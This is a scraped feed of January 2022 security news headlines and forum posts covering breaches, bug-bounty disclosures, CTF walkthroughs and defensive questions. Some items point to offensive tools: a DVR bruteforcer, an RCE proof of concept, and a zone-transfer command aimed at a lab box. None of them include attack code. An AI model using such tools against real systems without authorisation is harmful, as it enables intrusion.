    submitted by /u/Any_Gas_6250 [link] [comments]  ( 1 min )
    HOUDINI: A web app with huge number of Docker Images for Network Security with run commands and cheatsheet (Hundreds of Offensive and Useful Docker Images for Network Intrusion )
    submitted by /u/deleee [link] [comments]  ( 1 min )
    How mail server related DNS settings (SPF, DKIM, DMARC, MTA-STS, DANE, BIMI) work and their usage stats in the top 1M domain
    submitted by /u/c0r0n3r [link] [comments]  ( 1 min )
    First Morello prototype architecture silicon (memory safety at a hardware level)
    submitted by /u/unaligned_access [link] [comments]  ( 3 min )
    SMBSR made it through another lockdown with some new interesting skills (and fixes). Go check out and judge it (respectfully)
    submitted by /u/oldboy21 [link] [comments]  ( 1 min )
    OctopusWAF is an open-source web application firewall made in C language and uses libevent resources.
    submitted by /u/CoolerVoid [link] [comments]  ( 1 min )
  • Open

    SecWiki News 2022-01-20 Review
    A brief analysis of modern enterprise network security architecture by ourren. For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Hackable: 3 VulnHub Walkthrough
    Hackable: 3, Vulnhub medium machine was created by Elias Sousa and can be downloaded here. This lab is designed for experienced CTF players who want to The post Hackable: 3 VulnHub Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

    Rust – Security advisory for the standard library (CVE-2022-21658)
    Article URL: https://blog.rust-lang.org/2022/01/20/cve-2022-21658.html Comments URL: https://news.ycombinator.com/item?id=30007470 Points: 10 # Comments: 0  ( 2 min )
  • Open

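    Attackers use adult games as bait to spread malware via cloud storage
    Recently, security researchers found DDoS IRC Bot malware samples disguised as adult games being spread via cloud storage services.  ( 1 min )
    Attackers begin using XLL files in attacks
    Recently, researchers have observed an increase in attacks using malicious Microsoft Excel add-in (XLL) files.  ( 1 min )
    Cybersecurity sandbox market to reach USD 43 billion by 2027
    China's cybersecurity sandbox market is expected to reach USD 6.9 billion by 2027.  ( 1 min )
    “Information security technology - Basic requirements for the competence of cybersecurity practitioners” (draft for comment) released
    The Basic Requirements specify the categories of cybersecurity practitioners and the knowledge and skills each category must have, and apply to the selection, training, evaluation and management of cybersecurity practitioners by organizations of all kinds.
    Marketing giant RRD admits data was stolen in Conti ransomware attack
    US marketing giant RR Donnelly (RRD) recently disclosed that data was stolen from it in a cyberattack in December. BleepingComputer later confirmed that it was a Conti ransomware attack. RRD is a leading integrated services company that provides communications, commercial printing and marketing services to enterprise customers. The company has more than 33,000 employees at over 200 locations worldwide, and its 2021 revenue was USD 4.93 billion. On December 27, 2011, RRD to the US Securities and Exchange Commission (SEC)
    Nine government departments jointly issue “Several Opinions on Promoting the Standardized, Healthy and Sustainable Development of the Platform Economy”
    The Opinions set out nineteen measures covering improving rules and systems, raising regulatory capability and standards, optimizing the development environment, strengthening capacity for innovative development, empowering economic transformation, and safeguard measures.
    International Committee of the Red Cross hit by cyberattack; data of more than 515,000 people leaked
    The International Committee of the Red Cross disclosed that its data contractor suffered a cyberattack, leading to the leak of information from the “family reunification” program and the theft of personal data of more than 515,000 people.  ( 1 min )
    FreeBuf Morning News | US agents use WhatsApp to monitor Chinese phones; China's first cybersecurity industry service short number launched
    According to a government surveillance filing recently unsealed in Ohio, in November 2021 investigators from the US Drug Enforcement Administration asked WhatsApp to track 7 users located in China.  ( 1 min )
    CACTER Email Security & Zhongrui Tianxia (中睿天下) release Q4 2021 enterprise email security report: take note, phishing emails doubled, 85% from overseas!
    CACTER Email Security and Zhongrui Tianxia (中睿天下) jointly release an email security report! Phishing emails doubled year on year! 85% of them actually come from overseas? With the year-end approaching, raising your guard cannot wait  ( 1 min )
    Design and application of an IoT security platform based on the SM9 commercial cryptographic algorithm
    How to solve IoT security has become a difficult problem facing government regulators and enterprises of all kinds. Rolling out a complete, scientific and standardized IoT security platform has therefore become a top priority.  ( 1 min )
    What does a 90-point server room look like? (Part 1)
    Following on from the previous article, “What does a 90-point server room look like? (Part 1)”, this article continues with the evaluation standards for three other aspects of server room equipment.  ( 1 min )
    Renzixing (任子行) video network solution, focused on protecting video surveillance data!
    Netizens have reported that on Bilibili one can still find accounts that appear to specialize in cracking surveillance video from public places such as schools and hospitals and uploading it, and that through these accounts one can see multiple user-uploaded surveillance clips of teachers giving lessons, hospital nurses' stations and hotel front desks.
    Dissecting ROP construction with NX enabled
    When learning pwn, we often run into cases where NX is enabled, meaning the stack is non-executable. In this situation we need to use contents left uncleared on the stack, or functions such as init, to construct a ROP chain and go on to write an exp to get a shell.  ( 1 min )
    Marketing giant's data stolen, International Red Cross hit by cyberattack | Global cybersecurity hot topics for January 20
    FBI warning: scammers are using fake QR codes to steal your passwords and money.  ( 1 min )
    Phishers are impersonating the US Department of Labor to steal users' Office 365 accounts
    The phishing campaign has been running for at least several months; the email senders pose as senior DoL employees and invite recipients to submit bids for ongoing government projects.
    FreeBuf Cybersecurity Chronicle | 2021 roundup of domestic cybersecurity incidents
    The domestic network environment has remained in dire straits, the trend toward confrontation in cyberspace is increasingly evident, and the frequency of cyberattacks from other countries keeps rising.  ( 1 min )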
  • Open

    Honeypot Discussions Part-3
    In this article, we will end the honeypot trilogy. If you haven’t yet read Part-1 and Part-2, you may take a look at them first. Or we can… Continue reading on Medium »  ( 7 min )
  • Open

    How Stack Overflow users responded to Log4Shell, the Log4j vulnerability
    Article URL: https://stackoverflow.blog/2022/01/19/heres-how-stack-overflow-users-responded-to-log4shell-the-log4j-vulnerability-affecting-almost-everyone/ Comments URL: https://news.ycombinator.com/item?id=30003308 Points: 2 # Comments: 0  ( 6 min )
  • Open

    wildlife photos
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]

  • Open

    Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike
    submitted by /u/dmchell [link] [comments]
    Kraken the Code on Prometheus
    submitted by /u/dmchell [link] [comments]
    PerSwaysion Threat Actor Updates Their Techniques and Infrastructure
    submitted by /u/dmchell [link] [comments]
    The OAuth Misconfiguration
    submitted by /u/banginpadr [link] [comments]
  • Open

    Xelu's FREE Controller Prompts | Visual prompts for every mainstream controller's inputs
    submitted by /u/PCubiles [link] [comments]  ( 1 min )
    A large folder of Charles Manson audio recordings
    http://109.120.203.163/Music/BLUES%20and%20country/Charles%20Manson/ Go upwards for more. If anyone finds any steel lap guitar resources, send them my way. I've decided to focus on music and living a simple life, something my life the last few years hasn't been. I changed countries, moved to the country and took a job in nursing. (until I convince my friend Andy to let me session/ tour with his band.) submitted by /u/inoculatemedia [link] [comments]  ( 1 min )
    D&D stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391724 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by npesaresi: https://hackerone.com/reports/1391725 - Bounty: $450
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391726 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391727 - Bounty: $250
    Yet another SSRF query for Javascript
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391728 - Bounty: $250
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by luuliiromee: https://hackerone.com/reports/1391729 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by ciohianz: https://hackerone.com/reports/1391771 - Bounty: $450
    Yet another SSRF query for Go
    GitHub Security Lab disclosed a bug submitted by avada: https://hackerone.com/reports/1391772 - Bounty: $450
    [GO]: [CWE-090: LDAP Injection All For One]
    GitHub Security Lab disclosed a bug submitted by pupiles: https://hackerone.com/reports/1397942 - Bounty: $1800
    [Python]: CWE-079: HTTP Header injection
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1401159 - Bounty: $1800
    [Python]: JWT security-related queries
    GitHub Security Lab disclosed a bug submitted by jorgectf: https://hackerone.com/reports/1403263 - Bounty: $1800
    ihsinme: CPP Add query for CWE-675 Duplicate Operations on Resource
    GitHub Security Lab disclosed a bug submitted by ihsinme: https://hackerone.com/reports/1413540 - Bounty: $1000
    [porcupiney.hairs]: [Python] Add Flask Path injection sinks
    GitHub Security Lab disclosed a bug submitted by porcupineyhairs: https://hackerone.com/reports/1413541 - Bounty: $1800
    [Java] CWE-400: Query to detect uncontrolled thread resource consumption
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1413542 - Bounty: $1800
    Java: Regex injection
    GitHub Security Lab disclosed a bug submitted by edvraa: https://hackerone.com/reports/1443028 - Bounty: $1000
    [Javascript]: [Clipboard-based XSS]
    GitHub Security Lab disclosed a bug submitted by someonenobbd: https://hackerone.com/reports/1448236
    [Java] CWE-089: MyBatis Mapper XML SQL Injection
    GitHub Security Lab disclosed a bug submitted by jessforfun: https://hackerone.com/reports/1442954 - Bounty: $4500
    [Java] CWE-552: Query to detect unsafe request dispatcher usage
    GitHub Security Lab disclosed a bug submitted by luchua: https://hackerone.com/reports/1454582 - Bounty: $1800
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1438393
    running a vulnerable log4j
    U.S. Dept Of Defense disclosed a bug submitted by alex_gaynor: https://hackerone.com/reports/1423496
    Reflected XSS on https:///via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029243
    Reflected XSS in https:// via hidden parameter ""
    U.S. Dept Of Defense disclosed a bug submitted by supr4s: https://hackerone.com/reports/1029238
    XSS Reflected -
    U.S. Dept Of Defense disclosed a bug submitted by drauschkolb: https://hackerone.com/reports/1223577
    Wrong settings in ADF Faces leads to information disclosure
    U.S. Dept Of Defense disclosed a bug submitted by h3xr: https://hackerone.com/reports/1422641
    User can pay using archived price by manipulating the request sent to `POST /v1/payment_pages/for_plink`
    Stripe disclosed a bug submitted by gregxsunday: https://hackerone.com/reports/1328278 - Bounty: $1000
    Dom Xss vulnerability
    Recorded Future disclosed a bug submitted by fornex: https://hackerone.com/reports/1448616
    Exposed Golang debugger on tier3.riot.mail.ru:9090, 9080
    Mail.ru disclosed a bug submitted by ian: https://hackerone.com/reports/1247910
  • Open

    Are you Looking for a team? Looking to collaborate with other hackers?
    We are looking for more members to join our team to collaborate on Projects, HackTheBox, CTF's & Bug Bounties. Our Members have found Vulnerabilities in the US Dept of Defense, Verizon Media, Yahoo & More on the HackerOne platform. We also have members that have been in the HTB Top 10 & 1st in the UK. You don't have to be the best, we are willing to help and teach members who may not be on our skill level, so please sign up if you're interested. We are trying to create a non-toxic environment in which hackers can collaborate without any drama. Please fill out our form and we will be in contact! Link to form: https://forms.gle/CDzVBLynAL9ftwK38 submitted by /u/Far-Piece-7371 [link] [comments]  ( 1 min )
  • Open

    PCAP Analysis
    Hi there. I am just starting to learn about PCAP analysis/forensics. I am experienced in Windows OS forensics and never really worked with PCAPs before. What are some of the tools everyone uses besides Wireshark? I've been reading up on Zeek. submitted by /u/antmar9041 [link] [comments]  ( 1 min )
    Tails Memory Forensics
    I was curious if anyone knows of any articles that cover this topic. A quick Google search hasn’t borne anything useful. Preferably a professional paper. submitted by /u/strollingginger [link] [comments]  ( 1 min )
    Degree decision
    Is CS or CE better for cyber forensics? submitted by /u/swatteam23 [link] [comments]  ( 2 min )
  • Open

    From MVP to ISO27001/SOC 2
    Hi Everyone, I just joined this community and would like to reach out with a question. I am a co-founder of an early-stage tech startup (saas) where we're about to reach our second product milestone soon - MVP. Our first commercial release ("Minimum Marketable Product") should happen around September 2022. We are about ten people, half of them developers. Everything is in the cloud. We have a Chief Architect who is a very mature professional. I don't have an IT background, but as we'd like to work with enterprises and other security-minded organizations, I am considering obtaining certification for standards like ISO27001 and/or SOC 2 (Type I and II). Is it a reasonable ambition to start this process as soon as our MVP is out (next month), or it's more realistic to wait until our product and team gains more maturity? If we have to pick, e.g. due to budget constraints, would you recommend to pursue ISO27001 or SOC 2? tl;dr: For a very young startup, what is the best time to start working on compliance and certifications? Thank you! submitted by /u/brunotoronto [link] [comments]  ( 3 min )
    Trend micro Apex One vs Deep Security/Cloud one
    Hi all, Is ApexOne good for Servers and Endpoints both? Or do we need to suggest Deep Security? If it is not good for Servers, why so? I know they are both the products of trend micro, but am not able to find understandable differences between both, need to know the difference between them for a project. Any kind of information or help on this would be nice, thank you. submitted by /u/aaronthecoolgnome [link] [comments]  ( 1 min )
    Hacking books(python) for intermediate programmers
    Some good python books for people who don't know anything about hacking but are intermediate programmers. I've read the book :- Starting out with Python, 5th Edition, ISBN : 9780135929032 submitted by /u/SufficientResident59 [link] [comments]
    Why do hackers like using reverse proxies?
    submitted by /u/baghdadcafe [link] [comments]  ( 1 min )
    Why do people put dots at the end of everything they send in work messages?
    Okay, I know this may not be the right Reddit sub for this question but I figured in IT most of us deal with teams or some sort of messaging. I know this also is kind of a weird thing to make a post about but it just is something I don't understand and genuinely want to. Whenever I message people at work or they message me they always leave dots at the end of a lot of the things they are saying. I have gotten dozens of messages saying "Hello...". It is not a typo either there is no way it could be. It reminds me of when someone texts you something and add it for dramatic effect but it will literally be messages like the one above saying hello or just "Sure...". It's just kind of odd to me but just was wondering if anyone knew why. Edit: Grammar & Thanks for the Informative Responses! submitted by /u/winningrove [link] [comments]  ( 4 min )
    Resources for Compensation
    Hi Everyone, I need some help finding compensation resources. Our security team has been having conflict over compensation with our HR compensation team. We want them to change the compensation band for a Mid-Level Security Analyst because the starting salary is $90k (105 Overall COL area). They tell us they want to start roles at 85% of the grade for the band which is around $70k-$80k. The role requires 5 years of IT exp with 2+ of Security. They claim they have done research but won't share their evidence stating the role is graded properly. It doesn't seem to align with what I have been seeing for other jobs, what people are asking for, or what I found on NIST NICE. What resources are out there to help identify compensation for roles in cyber by industry (i.e. e-commerce, higher ed, govt, etc)? I want to bring something to them that says we are way below market and cannot be competitive but they seem to know otherwise. EDIT: I'm the hiring manager for the role submitted by /u/gnomeparadox [link] [comments]  ( 3 min )
    How anonymous is an Azure/AWS VM?
    I would like to mess with some scammers but would like to stay fairly anonymous. Am I correctly understanding that my identity is fairly safe when using a VM on Azure or AWS? I am aware MS/Amazon could still pass my identity to the government but I'm not worried about that. My main concern is to stay hidden from the scammers. Thanks in advance for your reply. submitted by /u/LouTr0n [link] [comments]  ( 1 min )
    Python and C++ Hacking Projects
    What are good cybersecurity projects for someone who is a beginner-intermediate in hacking? submitted by /u/Odd_Rip6706 [link] [comments]  ( 1 min )
    How does my university perform MITM monitoring on secure HTTPS connections?
    Hi AskNetsec, After suspicions towards my university's network provider (Eduroam), I have been digging into the extent to which they do, and/or are able to, monitor the activity of the students while they are on the network. Besides the rather normal DNS restrictions of monitoring and blocking potentially harmful DNS requests, or in this case redirecting to a custom warning page, I have discovered something I would consider unusual. When accessing certain websites with a secure connection, HTTPS, the certificate for the website is tampered with. Meaning that the certificate for a given website, when requested through the university network, is not identical to the certificate returned when requesting from any other network. When digging deeper into the certificates, I found that custom …  ( 7 min )
  • Open

    How to find prospects for free?
    Do you want to build a prospecting list quickly and for free? Continue reading on Medium »  ( 4 min )
    Fun with Google Maps
    I recently posted a Tweet stating that one is able to search Google Maps by name, username, email, phone number, area code…in fact… Continue reading on Medium »  ( 1 min )
    Social Media OSINT
    Searching for accounts by username on social media applications. Continue reading on Medium »  ( 3 min )
    SpiderFoot (Automate OSINT for Threat Intelligences)
    About SpiderFoot Continue reading on Medium »  ( 1 min )
  • Open

    Bug Bounty: earn up to 100,000 PTP
    (at the time of writing, 100k PTP > $1M) Continue reading on Medium »  ( 1 min )
    Hacking with Subdomain3
    Subdomain3 is a great tool that can be used to discover subdomains that belong to a website. The tool is written in Python3. Continue reading on Medium »  ( 1 min )
    Live Bug Bounty Training With My Strategy and Let’s hit easily Bounties Together in this year
    Hello Cybersecurity Researchers, Again I’m here after a lot of texts received on my LinkedIn and Instagram that when I launch my Live Bug… Continue reading on Medium »  ( 1 min )
    How I messed up my own profile data
    Just wanted to share one of my experiences which I had while testing one of the web applications. I will be brief so that I do not waste… Continue reading on Medium »  ( 2 min )
    Top 25 Server-Side Request Forgery (SSRF) Bug Bounty Reports
    In this article, we will discuss the Server-Side Request Forgery (SSRF) vulnerability, and present 25 disclosed reports based on this flaw. Continue reading on Medium »
    Extreme Hacking Mindset
    How to dominate in bug bounties Continue reading on Medium »
    How I found High-Priority PII leak through web archive
    Hello Hackers, Aditya here I am a cyber security student and bug bounty hunter. Continue reading on Medium »  ( 1 min )
  • Open

    CryptoLyzer: A comprehensive cryptographic settings analyzer (introduction with a comparison of cryptographic settings analyzers)
    submitted by /u/c0r0n3r [link] [comments]
    Privilege escalation in Acer Care Center by @last0x00 and @APTortellini
    submitted by /u/last0x00 [link] [comments]
    Introducing TREVORproxy and TREVORspray 2.0
    submitted by /u/aconite33 [link] [comments]
    Gorillas: Special offer - unicorn slices, 150g 🦍❤️
    submitted by /u/moviuro [link] [comments]
    Demonstrating how phishermen abuse free hosting
    submitted by /u/df_works [link] [comments]  ( 1 min )
    SeeYouCM-Thief: Exploiting common misconfigurations in Cisco phone systems
    submitted by /u/HackingLZ [link] [comments]
  • Open

    SecWiki News 2022-01-19 Review
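    A context-aware-computing-based method for tracking APT attack groups by ourren; 2021 Global DDoS Threat Report by ourren; Who Moved My DevOps: DevOps Risk Mapping by ourren. For more of the latest articles, visit SecWiki  ( 2 min )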
  • Open

    How Do You Know What "Bad" Looks Like?
    From the time I started in DFIR, one question was always on the forefront of incident responder's minds...how do you know what "bad" looks like? When I was heading on-site during those early engagements, that question was foremost on my mind, and very often, the reason I couldn't sleep on the plane, even on the long, cross country flights. As I gained experience, I started to have a sense of what "bad" might or could look like, and that question started coming from the folks around me (IT staff, etc.) while I was on-site. How do you know what "bad" looks like? The most obvious answer to the question is, clearly, "anything that's not "good"...". However, that doesn't really answer the question, does it? Back in the late '90s, I did a vulnerability assessment for an organization, and at one …  ( 6 min )
  • Open

    Writer HackTheBox Walkthrough
    Introduction Writer is a CTF Linux box with difficulty rated as “medium” on the HackTheBox platform. The machine covers SQL injection vulnerability and privilege escalation The post Writer HackTheBox Walkthrough appeared first on Hacking Articles.  ( 6 min )
  • Open

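    [Security Bulletin] Weblogic January update covers multiple high-severity vulnerabilities
    Oracle recently released its January 2022 security update, covering 497 vulnerabilities across its products (Weblogic Server, Database Server, Java SE, MySQL and others). The vulnerabilities fixed in this update include...  ( 1 min )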
  • Open

    Discovering a security vulnerability in a major grocery delivery platform
    Article URL: https://zerforschung.org/posts/gorillas-en/ Comments URL: https://news.ycombinator.com/item?id=29991743 Points: 235 # Comments: 70  ( 8 min )
  • Open

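    Linux malware infections grew 35% in 2021
    According to statistics, malware infections targeting Linux devices rose 35% during 2021.  ( 1 min )
    FreeBuf Morning Briefing | US reviews Alibaba's cloud business; US Democrats introduce bill to ban surveillance advertising
    Fashion giant Moncler has confirmed a data breach after files were stolen in December by the AlphV/BlackCat ransomware operation and published on the dark web.  ( 1 min )
    Fashion giant confirms ransomware attack, 11 million phones infected with trojan | Global cybersecurity highlights for January 19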
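    Cybercrime case analysis: ticket-grabbing crawler (No. 40)
    Developed a crawler to grab tickets and made an illegal profit of 120,000 yuan; convicted of the crime of providing programs and tools for intruding into or illegally controlling computer information systems, and sentenced to three years' imprisonment.  ( 1 min )
    APT Group Archive | Analysis of APT group activity in 2021
    This article is one of a series of highlights from the "APT Group Intelligence Research Yearbook"; it mainly introduces NSFOCUS's 2021 crawler-framework- and knowledge-graph-based natural language processing technology mentioned in the yearbook.  ( 1 min )
    US Department of Commerce publishes the minimum elements for a Software Bill of Materials (SBOM)
    Defining the minimum elements of an SBOM is an iterative process. This report is a starting point, not the final word.  ( 1 min )
    Critical SAP vulnerability could lead to supply chain attacks
    CVE-2021-38178 has a CVSS score of 9.1, and its patch was released on SAP's October 2021 Patch Day. The vulnerability is described as an improper authorization issue that could allow an attacker to tamper with transport requests, thereby bypassing quality gates and transferring code artifacts to production systems.  ( 1 min )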

  • Open

    Is month of birth considered PII when combined with name (in California if that’s relevant?)
    I would like to add month of birth (without day/date/year) as criteria in a new active directory build, but cannot find a clear cut answer as to whether this is considered PII or not. Thank you in advance. submitted by /u/erpa2b [link] [comments]  ( 1 min )
    Is This Memory Diagram From Practical Malware Analysis Correct?
    I am reading through Practical Malware Analysis and I came across an image of a program's memory layout (Page 69). I have always understood that the stack started at a high memory address and grew towards a lower address, but the diagram in the book shows otherwise. Is there some aspect of this figure I am misinterpreting, or is there a reason why this specific image is different than the stack I am accustomed to? Image in the Book: https://i.imgur.com/vLtI3eC.png My Current Interpretation of Memory: https://i.imgur.com/Rt7H4Oj.png Thanks for the help! *Reposted from r/netsecstudents submitted by /u/pufftux [link] [comments]  ( 2 min )
    Taking notes while learning a course
    Hi everyone, I am currently working as a cyber security analyst with about 1.8 years of endpoint security experience and overall 6 years of cyber security experience. Would like your opinion on whether taking notes while you are learning a course like say Wireshark or Linux is necessary? If no, why? If yes, what is the best way to take notes on something like OneNote, as I feel it's difficult to take notes while watching a video. submitted by /u/aaronthecoolgnome [link] [comments]  ( 3 min )
    Client Certificate Authentication check
    In my company we need to implement Client Certificate Authentication in our web service. Certificates should be self signed and generated by the client. Then they send us the certificate without public key. My idea is that we store these certificates in the database. Now, I am not sure which field should I use to check authenticity of the certificate - thumbprint, subject, something else or multiple fields? I could also completely check public key in database against public key from incoming certificate. What are the recommendations for this scenario? submitted by /u/mandaric [link] [comments]  ( 2 min )
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal ip address of 10.10.10.7 Then what will? and how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? 3.) Why did "dig axfr xxxx.htb @10.10.10.xx " work? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Reso…  ( 2 min )
    Understanding host.cnf, DNS, and how to tie it all together?
    I'm currently doing CronOS on HTB. I realize that 1.) 8.8.8.8 will not translate the internal ip address of 10.10.10.7 Then what will? and how do I find the correct DNS server that will? 2.) I need to add 10.10.10.7 cronos.htb into /etc/host.cnf I know by reading that you were supposed to enumerate the hostname because not all hostnames are [nameOfBox].htb... but how was I supposed to know that cronos.htb was the hostname? How do I find out? Also, what knowledge am I missing here? I read up on DNS zone transfer attacks and general stuff about DNS, but I'm just not connecting it maybe? I think this topic is very important in the future in regards to large corporate internal networks. I could use some guidance! Resources I've read so far (for those that stumble on this th…  ( 2 min )
    NIST compliant web application scanners
    What are some NIST compliant web app vulnerability scanners that you have come across? 50+ targets. submitted by /u/Dalgan [link] [comments]
    where can I view a full list of MDE detection and alerting rules?
    I've looked everywhere but it seems like this should be available. submitted by /u/slnt1996 [link] [comments]  ( 1 min )
    Can a server send an echo reply with different data?
    I know that's an unusual question, but I know I can send data to my server using ICMP packets (Hiding in the last 48 bytes of the packet, it could be more, but that could be suspicious), but can I receive data from the server? Looking at wireshark I realized the payload was the same in the reply submitted by /u/_JesusChrist_hentai [link] [comments]  ( 1 min )
    Trying to set up an isolated node on a LAN network
    I have a secondary router off of my main network that I am trying to make as invisible to the rest of the network as I can. Off of that router I am trying to configure a raspberry pi 4b so it is as secure as I can make it. Potential threat vectors include individuals and small groups. submitted by /u/alonelyvoicespeaks [link] [comments]  ( 1 min )
  • Open

    BlueTeamLabs.Online
    Has anyone tried BlueTeamLabs.Online? I read there was a forensics pathway. Does anyone know if the forensics pathway is any good? Thanks! submitted by /u/DeadBirdRugby [link] [comments]  ( 1 min )
    Check Authenticity of Zip Creation Date
    Hello guys, I need help! Basically, a friend of mine mistakenly submitted the wrong assignment (zip file). Later on he realized and emailed the teacher explaining the situation and attaching the right assignment (zip file) creation and modification date as proof. The teacher says that anyone can revert the OS date and zip the file, resulting in an unauthentic creation date of the zip file. My friend wants to find a method to prove to the teacher that the right assignment (zip file) was done on time and its creation date & modification date are authentic. My friend uses Windows 10 and is in desperate need of help. Any help will be deeply appreciated. submitted by /u/themidfinger007 [link] [comments]  ( 2 min )
    FORENSIC SOFTWARE RECOMMENDATION
    submitted by /u/tsipikau [link] [comments]  ( 1 min )
  • Open

    Zooming in on Zero-click Exploits (Project Zero)
    submitted by /u/albinowax [link] [comments]
    A Beginner’s guide into Router Hacking and Firmware Emulation
    submitted by /u/secnigma [link] [comments]
    Vulnerable AWS Lambda function - Initial access in cloud attacks
    submitted by /u/MiguelHzBz [link] [comments]
    Telenot Complex: Insecure AES Key Generation
    submitted by /u/0xdea [link] [comments]
    Dahua DVRs and Webcams bruteforcer at port 37777
    submitted by /u/falx1fer [link] [comments]
    Robust and blazing fast open-redirect vulnerability scanner with the ability to recursively crawl all web forms, entry points, or links with data.
    submitted by /u/falx1fer [link] [comments]  ( 1 min )
    Mixed Messages: Busting Box’s MFA Methods | Varonis
    submitted by /u/VaronisThreatLabs [link] [comments]
    How to securely implement TLS certificate checking in Android apps
    submitted by /u/Masrepus [link] [comments]  ( 1 min )
    An attempt to understand container runtime
    submitted by /u/alt-glitch [link] [comments]  ( 1 min )
    Public exploit POC for critical windows http RCE impacting multiple windows versions
    submitted by /u/markcartertm [link] [comments]  ( 2 min )
    Stealing administrative JWT's through post auth SSRF - VMWare Workspace One Access (CVE-2021-22056)
    submitted by /u/Mempodipper [link] [comments]
  • Open

    Destructive malware targeting Ukrainian organizations
    submitted by /u/SCI_Rusher [link] [comments]
    How to Analyze Malicious Microsoft Office Files
    submitted by /u/dmchell [link] [comments]
  • Open

    CALISHOT 2022-01: Find ebooks among 373 Calibre sites this month
    Happy New Year, Folks! Here is the fresh new snapshot of the working calibre servers. Some minor improvements are coming with it: the sizes are now displayed, and the links to the covers are also provided. It's useful, as you may know that a book is unavailable in real time if the cover is empty, without having to click on the book link. ANNOUNCEMENT: The calibre story started 2 years ago and during this long journey another sub more focused on this kind of content has been created for various reasons. For this new year, I've decided to stop sharing the calishots in the current sub. If you're still interested in future dumps you can track them on the other one. Other resources will be proposed on it soon, like a wiki, tips, the datasets, original calibres, and some news about related tools like calisuck, calishot ... which are now turning into a single new project and will be released soon. Your contributions are also welcome on the sub. submitted by /u/krazybug [link] [comments]  ( 1 min )
    Help with scraping website with static .htm's (without sitemap)
    Hi Reddit, I've been trying to download this website (Cisco RV325 Emulator - Emulator) for full offline usage, and have used a variety of different tools with little success so far. I know it can be done because people have linked zip file downloads for other emulators in the cisco forums. I've tried wget, httrack, archivebox and several online website downloaders, however the problem I'm facing is as follows: If I download https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm I can load up the page locally but clicking on any of the menu items does nothing. It is just a static page which looks correct but isn't functional. I've tested winhttrack and wget settings of (-m -k) (-r -np -c) and another which uses (-l0) but I can't remember what the rest of the args were. From inspecting some of the urls using the online working version, I can see that each menu item has its own unique .htm page, which can be opened separately (online) if you just wanted to view that page and not be able to traverse to other pages (there is no menu bar). For example: Main Page - https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/default.htm Using the sidebar to go from Homepage > Port Management > Port setup, the online url is unchanged but clearly a separate static page for it exists because you can go to https://www.cisco.com/assets/sol/sb/RV325_Emulators/RV325_Emulator-SB_v1-2-1-14/lan_setting.htm and access the same thing (only that page's settings, not anything else) This means that if I downloaded this lan_setting.htm page and pointed to it in the local html, I should be able to access it right? The problem is that I don't know how to find all of these individual settings .htm page urls, and downloading them all manually and setting up local links in the main html file would take forever. ​ I hope I've explained this well enough, please accept my apologies in advance if I haven't ! 
    submitted by /u/prymenumba [link] [comments]  ( 2 min )
    Worthy Bookmark: The Latest Google Dorks List - Jan 2022 DB Update
    submitted by /u/little_maggot [link] [comments]
  • Open

    Russian Roulette: Using Optical Character Recognition to investigate military equipment transfers
    What can we learn about Russian equipment transfers from a single Twitter video? Quite a lot, actually. Continue reading on Medium »  ( 3 min )
    Solution to the #IMINT #OSINT challenge
    This writeup is the solution to a challenge set by Professor Gordon Farrer, for me a leading figure in this field and a person from whom… Continue reading on Medium »  ( 3 min )
  • Open

    How To Run Or Install Hakrawler Bug Bounty Tool on Kali Linux
    Hakrawler: Tool used to gather URLs and JavaScript file locations. Continue reading on Medium »  ( 1 min )
    Bug Bounty Program — Earn Up to 100,000 PTP
    Learn more about bug bounty program. Continue reading on Platypus.finance »  ( 1 min )
    My Bug Bounty Adventure -1-
    Greetings from Constantinople to all, Continue reading on Medium »  ( 2 min )
    Introducing the Exponent Bug Bounty Program in Collaboration with Immunefi
    Website | Litepaper | Twitter | Medium | Discord | Bug Bounty Program Continue reading on Medium »  ( 3 min )
    Bug Bounty Recon: Content Discovery (Efficiency pays $)
    Content Discovery — The process of finding vulnerable endpoints; URLs, Parameters and Resources. Continue reading on Medium »  ( 5 min )
    The New King “Broken Access Control”
    The King (Injection Bug) who was ruling the bug world for more than a decade is now conquered by the New King known as “Broken Access… Continue reading on Medium »  ( 1 min )
    Cross Site Port Attack in Wild
    Hello Hunter, Sorry for the delay of post and this is my first post in this year, I hope you’re all doing well and happy. So without… Continue reading on Medium »  ( 2 min )
  • Open

    Facing DevSecOps hurdles, federal agencies need a modern approach to security
    Increased threats mean the government can’t sleep on cybersecurity. Learn how federal agencies can improve their security posture without sacrificing innovation. READ MORE  ( 4 min )
  • Open

    SecWiki News 2022-01-18 Review
    A comprehensive analysis of the Israeli “Pegasus” spyware attack incidents by ourren For more of the latest articles, visit SecWiki  ( 2 min )
  • Open

    Go: Getting Started with Fuzzing
